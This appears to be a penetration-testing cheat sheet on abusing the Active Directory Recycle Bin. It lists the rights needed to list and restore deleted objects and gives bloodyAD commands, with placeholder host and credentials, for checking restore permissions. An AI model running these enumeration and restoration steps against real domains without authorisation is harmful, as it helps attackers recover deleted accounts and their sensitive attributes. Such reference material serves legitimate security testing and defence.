Active Directory - Recycle Bin
Details
- Deleted objects have a default retention time of 180 days
- Recycle Bin path:
CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=example,DC=com
Enable Active Directory Recycle Bin in PowerShell
Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=contoso,DC=com' -Scope ForestOrConfigurationSet -Target 'contoso.com'
Deleted Objects
Requirements:
LIST_CHILDright on the Deleted Objects container- OID
1.2.840.113556.1.4.2064: shows deleted, tombstoned, and recycled
Exploitation:
-
List rights
-
Check all rights from the requirements
-
List deleted objects with bloodyAD
-
List deleted objects with PowerShell
Restore Objects
Requirements:
Restore Tombstonedright on the domain objectGeneric Writeright on the deleted objectCreate Childright on the OU used for restoration
By default, only Domain Admins are able to list and restore deleted objects.
On restoration some objects retains attributes:
- Deleted objects retain all their attributes (including sensitive ones)
- Tombstoned objects retain most important attributes
Exploitation:
-
Check restore rights
bloodyAD --host 10.10.10.10 -d domain -u user -p 'Password123!' get object 'DC=domain,DC=local' --attr ntsecuritydescriptor --resolve-sd bloodyAD -u user -d domain -p 'Password123!' --host 10.10.10.10 get search -c 1.2.840.113556.1.4.2064 --filter '(&(isDeleted=TRUE)(sAMAccountName=deleted-computer$))' --attr ntsecuritydescriptor --resolve-sd bloodyAD --host 10.10.10.10 -d domain -u user -p 'Password123!' get object 'CN=Users,DC=domain,DC=local' --attr ntsecuritydescriptor --resolve-sd -
Restore the object using the sAMAccountName or objectSID